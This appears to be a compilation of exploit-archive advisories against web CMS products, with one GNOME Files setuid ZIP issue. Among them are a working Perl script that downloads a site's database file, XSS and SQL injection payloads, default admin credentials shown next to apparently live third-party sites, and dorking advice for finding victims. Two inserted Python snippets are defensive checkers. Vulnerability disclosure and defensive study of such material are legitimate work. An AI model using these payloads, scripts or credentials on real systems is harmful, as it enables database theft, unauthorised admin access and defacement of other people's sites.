<pre><code>====================================================================================================================================<br />| # Title : Data Driven CMS v0.4.1 database disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://codecanyon.net/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb) file.<br /> The (acart.mdb) file is the database and contains all the data.<br /> <br />[+] Dorking in Google or other search engine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># Asp Data Driven Website Database Exploit <br />#<br /># Author : indoushka<br />#<br /># Vendor : https://codecanyon.net/<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('Asp Data Driven Website Database Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="acart.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>Affected: GNOME Files 43.4 (nautilus) on Fedora 37<br /><br />Description:<br /><br />If a user A opens in GNOME Files a zip archive containing a<br />`setuid` file F, then F will be silently extracted to<br />a subdirectory of CWD.<br /><br />If F is accessible by a hostile local user B and B executes F,<br />then F will be executed as user A.<br /><br />tar(1) and unzip(1) are not vulnerable to this attack.<br /><br />Session for creating the ZIP.<br />After that, just open f.zip in GNOME Files.<br /><pre><br />[joro@fedora ~]$ umask<br />0022<br />[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F<br />[joro@fedora 2]$ zip f F ; zipinfo f<br />Archive: f.zip<br />Zip file size: 155 bytes, number of entries: 1<br />-rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F<br />[joro@fedora 2]$ ls -ld /tmp/2/<br />drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/<br />[joro@fedora 2]$<br /></pre><br /></code></pre>
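A pre-extraction check for the condition described in the GNOME Files advisory above, as an added example that is not part of the original advisory: it reads each entry's Unix mode from the ZIP central directory, reports entries carrying setuid/setgid/sticky bits, and computes the mode an extractor should apply instead. The sample archive is constructed in memory and the function names are illustrative.

```python
import io
import stat
import zipfile

UNIX = 3  # create_system value written by Unix zip tools


def special_bit_entries(zf):
    """Return [(name, mode string)] for entries with setuid/setgid/sticky bits."""
    flagged = []
    for info in zf.infolist():
        if info.create_system != UNIX:
            continue  # upper 16 bits of external_attr are a Unix mode only here
        mode = info.external_attr >> 16
        if mode & (stat.S_ISUID | stat.S_ISGID | stat.S_ISVTX):
            flagged.append((info.filename, stat.filemode(mode)))
    return flagged


def safe_mode(info, umask=0o022):
    """Mode an extractor should apply: rwx bits only, special bits dropped."""
    mode = (info.external_attr >> 16) if info.create_system == UNIX else 0
    if not mode:
        mode = 0o644  # no Unix mode recorded: fall back to a plain file
    return stat.S_IMODE(mode) & 0o777 & ~umask


def build_sample():
    """Constructed sample: one entry F stored as -rwsr-sr-x, as in the session."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo("F")
        info.create_system = UNIX
        info.external_attr = (stat.S_IFREG | 0o6755) << 16
        zf.writestr(info, "hi\n")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    with zipfile.ZipFile(build_sample()) as zf:
        for name, mode in special_bit_entries(zf):
            print(f"refuse or strip: {name} {mode}")
        print("apply instead:", oct(safe_mode(zf.getinfo("F"))))
```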
<pre><code>======================================================================================================================================<br />| # Title : Varient News Magazine Script V2.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://varient.codingest.com/ | <br />| # Dork : "Varient - News Magazine - Varient" |<br />======================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Admin : admin@codingest.com & Pass : 1234<br /><br />[+] http://habergunuorg/admin<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>============================================================================<br />| # Title : video whisper conference v1.01 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://www.videowhisper.com/demos/conference/ | <br />| # Dork : "Video Conference by VideoWhisper.com" |<br />============================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] use payload : indoushka<acx><marquee><font color=lime size=32>indoushka</font></marquee><br /><br />[+] https://wwvideowhispercom/demos/conference/index.php?r=indoushka<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Videoflix Cms v1.3 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://codecanyon.net/item/videoflix-tv-series-movie-subscription-portal-cms/20839016 | <br />| # Dork : "Made with by Vmax-Studio." |<br />====================================================================================================================================<br /><br />poc : <br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Users : login email : admin@videoflix.com, password : abcdefg <br /><br />[+] http://arabflixcom/index.php?admin/dashboard<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code># Exploit Title: Social-Commerce 3.1.6 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 28/07/2023<br /># Vendor: mooSocial<br /># Vendor Homepage: https://moosocial.com/<br /># Software Link: https://social-commerce.moosocial.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4174<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message<br />and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /search/index<br /><br />GET parameter 'q' is vulnerable to XSS<br /><br />https://website/search/index?q=[XSS]<br /><br /><br />URL path folder [1,2] is vulnerable to XSS<br /><br />https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent<br /><br />https://website/user_info[XSS]/index/friends<br /><br />https://website/user_info/index[XSS]/friends<br /><br />https://website/faqs[XSS]/index?content_search=<br /><br />https://website/faqs/index[XSS]?content_search=<br /><br /><br /><br />XSS Payloads:<br /><br />j8chn"><img src=a onerror=alert(1)>ridxm<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: mooSocial 3.1.8 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 28/07/2023<br /># Vendor: mooSocial<br /># Vendor Homepage: https://moosocial.com/<br /># Software Link: https://travel.moosocial.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4173<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message<br />and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />URL path folder is vulnerable to XSS<br /><br />https://website/classifieds[XSS]/search?category=1<br /><br />https://website/classifieds/search[XSS]?category=1<br /><br /><br />XSS Payloads:<br /><br />ijz3y"><img src=a onerror=alert(1)>y4apk<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure<br /># Exploit Author: CraCkEr<br /># Date: 25/07/2023<br /># Vendor: Templatecookie<br /># Vendor Homepage: https://templatecookie.com/<br /># Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script<br /># Tested on: Windows 10 Pro<br /># Impact: Sensitive Information Leakage<br /># CVE: CVE-2023-4168<br /><br /><br />## Description<br /><br />An information disclosure issue exists in the redirect responses. When accessing any page on the website,<br />sensitive data, such as API keys, server keys, and app IDs, is exposed in the body of these redirects.<br /><br /><br />## Steps to Reproduce:<br /><br />When you visit any page on the website, like:<br /><br />https://website/ad-list?category=electronics<br />https://website/ad-list-search?page=2<br />https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=<br /><br />in the response body there is information leakage for<br /> <br />+---------------------+<br />google_map_key<br />api_key<br />auth_domain<br />project_id<br />storage_bucket<br />messaging_sender_id<br />app_id<br />measurement_id<br />+---------------------+<br /><br /><br />Note: The leaked information, such as the API keys, server keys, and app ID, is the same information that was added to the "Firebase Push Notification Configuration" in the Administration Panel.<br /><br />Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path:<br /><br />https://website/push-notification (Login as Administrator)<br /><br /><br /><br />[-] Done<br /></code></pre>
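A regression check a site owner could run over captured responses for the disclosure described in the Adlisting advisory above, as an added example that is not part of the original advisory: it flags 3xx responses whose body carries any of the listed configuration keys with a non-empty value and redacts the value in its report. The key/value syntax it matches is an assumption, and both sample responses are constructed with placeholder values.

```python
import re

# Key names the advisory lists as exposed in response bodies.
LEAKED_KEYS = (
    "google_map_key", "api_key", "auth_domain", "project_id",
    "storage_bucket", "messaging_sender_id", "app_id", "measurement_id",
)
# Assumption: values appear as "name": "value" or name = 'value' pairs.
PAIR = re.compile(
    r"""["']?\b(%s)\b["']?\s*[:=]\s*["']([^"']+)["']""" % "|".join(LEAKED_KEYS)
)

# Constructed sample responses (placeholder values, not real keys).
SAMPLE_LEAKY = (
    "HTTP/1.1 302 Found\r\nLocation: /login\r\n\r\n"
    '<script>var cfg = {"api_key": "EXAMPLEKEY0001", '
    '"app_id": "1:000:web:abc", "project_id": ""};</script>'
)
SAMPLE_CLEAN = "HTTP/1.1 302 Found\r\nLocation: /login\r\n\r\n"


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    return int(head.split("\r\n")[0].split()[1]), body


def leaked_in_redirect(raw):
    """Return {key: redacted value} for listed keys found in a 3xx body."""
    status, body = parse_response(raw)
    if not 300 <= status < 400:
        return {}
    found = {}
    for name, value in PAIR.findall(body):
        # Keep only a short prefix so the report does not re-leak the secret.
        found.setdefault(name, value[:4] + "*" * max(len(value) - 4, 0))
    return found


if __name__ == "__main__":
    for label, raw in (("leaky", SAMPLE_LEAKY), ("clean", SAMPLE_CLEAN)):
        print(label, leaked_in_redirect(raw))
```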
<pre><code>====================================================================================================================================<br />| # Title : Datalife Engine v10 (ir) SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://datalifeengine.ir/ |<br />| # Dork : Powered by DataLife Engine © 2013 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : /index.php?newsid=100 (inject here)<br /><br />[+] cpanel : http://127.0.0.1/datalifeengine/admin.php <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Database compilation CMS v1.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.2(32-bit) | <br />| # Vendor : http://mcastel.weebly.com/ | <br />| # Dork : "Database compilation by Marco Castellani( INAF - Astronomical Observatory of Rome)" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : /table1a.php?sel=<script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/table1a.php?sel=%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>